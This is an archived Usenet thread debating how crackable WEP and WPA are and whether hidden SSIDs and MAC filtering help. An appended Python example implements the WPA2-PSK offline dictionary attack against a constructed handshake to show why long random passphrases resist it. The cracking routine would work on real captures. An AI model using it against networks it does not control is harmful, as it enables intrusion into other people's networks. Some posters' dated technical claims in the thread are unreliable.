Archived from groups: comp.sys.laptops
Angry American wrote:
> I am aware of this all. I use a couple of simple programs to demonstrate
> to my customers how easy and vulnerable their networks are when they use
> wireless with the "default" settings.
Since the default settings typically have no security enabled, one would not
expect them to be secure. So what?
> I administer several local businesses
> as well as 4 local libraries and more home users than I can count. Using a
> program such as Cain and Abel will crack WEP in a matter of seconds as
> long as I can find the SSID.
From the "Cain & Abel v2.5 FAQ": "Can Cain crack WEP encryption ?
Not yet. WEP cracking requires a wireless card working in "monitor mode". In
this mode the card can capture packets at the 802.11 layer where some
required parameters reside. Not all adapters support "monitor mode" but
some of them do: cards based on Prism/2 chipset, some Cisco Aironet and
some Orinoco based cards can be put into monitor mode. Prism/2 adapters for
example use proprietary OIDs for vendor specific operations like
OID_CW10_CMD (0xFF010183h) which is used to send commands to the card. I
really need more information on specific hardware in order to directly
control a wireless card for WEP cracking.
If you want to see Cain cracking WEP encryption just help me !"
In other words, it can't crack WEP in seconds or minutes or hours or days or
years or millennia because it wasn't made with that capability.
You picked the wrong tool. To crack WEP you need Airsnort or WEPcrack, both
of which need to collect about ten million packets and rely on weak frames,
which the WEP-Plus protocol, which went into general use about two years ago,
substantially eliminates.
Given enough weak frames, Airsnort or WEPcrack can indeed crack WEP in a few
seconds. But that assumes that you have first gathered the necessary
number of frames.
You clearly haven't actually _tried_ this if you think it's that easy.
> If I do not have the broadcast name, then it
> does take longer, but it's still possible. A brute force attack against WPA
> can work, but it would take one hell of a machine to generate the crack.
Can you crack it in the five minutes you have available to you before the
key changes?
> IMHO it takes a lot less than the Government and the toys they have to
> crack a wireless network. There are too many tools available for free on
> the web that would make it pretty easy for any script kiddie with half a
> brain to break in.
The fact that there are tools available for free does not mean that those
tools work on a properly configured network.
The difficulty with WPA is that it is possible to misconfigure it in such a
way that it becomes vulnerable. Use a long random passphrase or RADIUS
and it becomes quite difficult to penetrate. If it's misconfigured then
you can grab a few packets and then throw a dictionary at it. That doesn't
work if it's configured with a non-dictionary password and with RADIUS it
morphs the key regularly so that you only have five minutes or so from
start of sniffing in which to crack the key.
> I do not have any customers as of yet that have "critical or sensitive"
> data. But if I did, I would recommend that they stay away from wireless
> altogether, or at least go with a company like Cisco and the Airnet
> technology that they use to further encrypt data.
What technology is that? Aironet doesn't do anything different from any
other standards-compliant implementation.
> I am no stranger to wireless, I just wish more people were aware of the
> vulnerabilities and risks associated.
Maybe you're no stranger to wireless, but given what you've said about the
subject you clearly _are_ a stranger to _cracking_ wireless.
>
> Dan
>
> J. Clarke wrote:
>> Angry American wrote:
>>
>>> Turning off SSID makes it harder to determine if you have a wireless
>>> network. All SSID is is the router advertising itself. This would be
>>> step one of keeping people out of your wireless LAN; what they don't
>>> know is there, they can't hack. WPA is more secure than WEP; you have
>>> to basically attack a system running WPA with an algorithm, and this
>>> takes time. WPA uses a 128-bit string, with some routers using a
>>> 256-bit string. WEP on the other hand has no such encryption and only
>>> takes a few seconds to crack.
>>
>> First, you need an algorithm to attack either. You do understand
>> what an "algorithm" is do you not? 'cout << "hello world";' is an
>> algorithm. Not a very interesting one, but an algorithm nonetheless.
>> The algorithm to attack WEP is well known; if one to attack WPA has
>> been published I'm not aware of it.
>>
>> Second, WEP and WPA use the same encryption. What's different about
>> WPA is the regular key change.
>>
>> Third, perhaps you might want to try cracking WEP on a brand new
>> router that someone else set up with 128 bit encryption and see how
>> long it takes. The WEP crack requires the collection of a large
>> number of "weak frames", a hole that was if not closed at least
>> patched quite a long time ago by adding checks for weak frames that
>> eliminate the transmission of most of them. You could be weeks or
>> months gathering enough weak frames to actually perform the crack.
>> With WPA there will be a key change before you've gathered enough
>> weak frames to perform the crack.
>>
>>> MAC filtering is just another step in the arsenal of keeping people
>>> from snooping your network. Using the three steps, along with
>>> changing your default network name (ie Linksys) to something else,
>>> and changing the default password will keep most people out of your
>>> network.
>>
>> Actually, just using WPA will keep just about anybody but possibly
>> government agencies out of your network, and them only if they want
>> in bad enough to turn their supercomputer arrays loose on the
>> problem, unlikely given that they have the authority to just walk in
>> and take all your hardware.
>>
>> The problem is that WPA has to be supported at both ends, which may be
>> problematical with some built-in network interfaces in laptops.
>>
>>> Dan
>>>
>>> William P.N. Smith wrote:
>>>> "Angry American" <angryamerican@nospamdooleyism.com> wrote:
>>>>> Not to mention WEP is almost no security whatsoever. Use WPA
>>>>> instead, with MAC filtering, and turn off your SSID broadcast.
>>>>
>>>> Uh, not exactly. WPA is just WEP with key change every 5 minutes or
>>>> so. MAC filtering only locks out people who can't do MAC spoofing,
>>>> which is pretty trivial, and turning off SSID broadcast does nothing
>>>> for you at all, and in fact breaks Windows WZC.
--
--John
Reply to jclarke at ae tee tee global dot net
(was jclarke at eye bee em dot net)
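The WPA-PSK dictionary attack John describes above ("grab a few packets and then throw a dictionary at it"), and why a long random passphrase defeats it, as an added worked example that is not part of the thread and is nobody's posted code. It implements the 802.11i derivation the attack relies on: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID as salt, 4096 iterations), PTK = PRF-512(PMK, MAC addresses, nonces), and the WPA2 EAPOL-Key MIC (HMAC-SHA1 truncated to 16 bytes) that lets every guess be checked offline against one captured handshake message. The SSID, MAC addresses, nonces, EAPOL frame and wordlist are constructed for the demo, not captured traffic; the only thing that separates the two outcomes is whether the passphrase is in the wordlist.

```python
import hashlib
import hmac
import secrets
import string

# IEEE 802.11i key derivation for WPA/WPA2-PSK. The algorithms are the real
# ones; every network-specific value further down is constructed for this demo.


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    Those 4096 iterations are the only per-guess cost a dictionary attacker pays."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf512(key: bytes, label: bytes, data: bytes) -> bytes:
    """802.11i PRF-512: HMAC-SHA1(key, label || 0x00 || data || i), i = 0..3,
    concatenated and truncated to 64 bytes."""
    out = b"".join(
        hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return out[:64]


def derive_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK from the PMK plus the two MACs and two nonces visible in the 4-way handshake.
    min/max on equal-length bytes is the byte-order comparison the standard specifies."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck: bytes, eapol_mic_zeroed: bytes) -> bytes:
    """WPA2 (key descriptor version 2) MIC: HMAC-SHA1 over the EAPOL-Key frame with
    its MIC field zeroed, truncated to 16 bytes. KCK is the first 16 bytes of the PTK."""
    return hmac.new(kck, eapol_mic_zeroed, hashlib.sha1).digest()[:16]


def crack_psk(wordlist, ssid, ap_mac, sta_mac, anonce, snonce, eapol_zeroed, captured_mic):
    """Offline dictionary attack: one PBKDF2, one PRF and one HMAC per candidate.
    No further traffic is needed once message 2 of the handshake has been captured."""
    for candidate in wordlist:
        pmk = derive_pmk(candidate, ssid)
        kck = derive_ptk(pmk, ap_mac, sta_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol_zeroed), captured_mic):
            return candidate
    return None


# ---- Constructed "capture" (not real traffic) ----
SSID = "linksys"                          # default SSID; it is also the PBKDF2 salt
AP_MAC = bytes.fromhex("001122334455")    # made-up addresses
STA_MAC = bytes.fromhex("66778899aabb")
ANONCE = bytes(range(32))                 # made-up nonces
SNONCE = bytes(range(32, 64))
# EAPOL-Key message 2: version 1, type 3, length 95, descriptor type 2, key info
# 0x010a (pairwise, MIC, HMAC-SHA1), key length 0, replay counter 1, then SNonce,
# IV (16), RSC (8), ID (8), MIC (16, zeroed for MIC computation), key data length 0.
EAPOL_ZEROED = (bytes.fromhex("0103005f02010a00000000000000000001")
                + SNONCE + bytes(16) + bytes(8) + bytes(8) + bytes(16) + bytes(2))
WORDLIST = ["admin", "linksys", "password", "letmein", "password123", "12345678"]


def capture_mic_for(passphrase: str) -> bytes:
    """Stand-in for sniffing: the MIC a station configured with this passphrase sends."""
    pmk = derive_pmk(passphrase, SSID)
    kck = derive_ptk(pmk, AP_MAC, STA_MAC, ANONCE, SNONCE)[:16]
    return eapol_mic(kck, EAPOL_ZEROED)


def attack(passphrase: str):
    """Run the dictionary attack against a handshake produced with `passphrase`."""
    return crack_psk(WORDLIST, SSID, AP_MAC, STA_MAC, ANONCE, SNONCE,
                     EAPOL_ZEROED, capture_mic_for(passphrase))


def random_passphrase(length: int = 20) -> str:
    """The 'long random passphrase' fix: 20 alphanumerics is ~119 bits of entropy."""
    alphabet = string.ascii_letters + string.digits
    return "".join(secrets.choice(alphabet) for _ in range(length))


if __name__ == "__main__":
    print("misconfigured (dictionary word):", attack("password123"))
    print("long random passphrase:         ", attack(random_passphrase()))
```

Two things the code makes concrete. The attacker needs the SSID because it is the salt, and hiding the beacon does not withhold it: it appears in the probe and association frames of every client that connects. And a RADIUS/802.1X network gives this attack nothing to guess at, because the PMK comes out of the EAP exchange rather than from a passphrase.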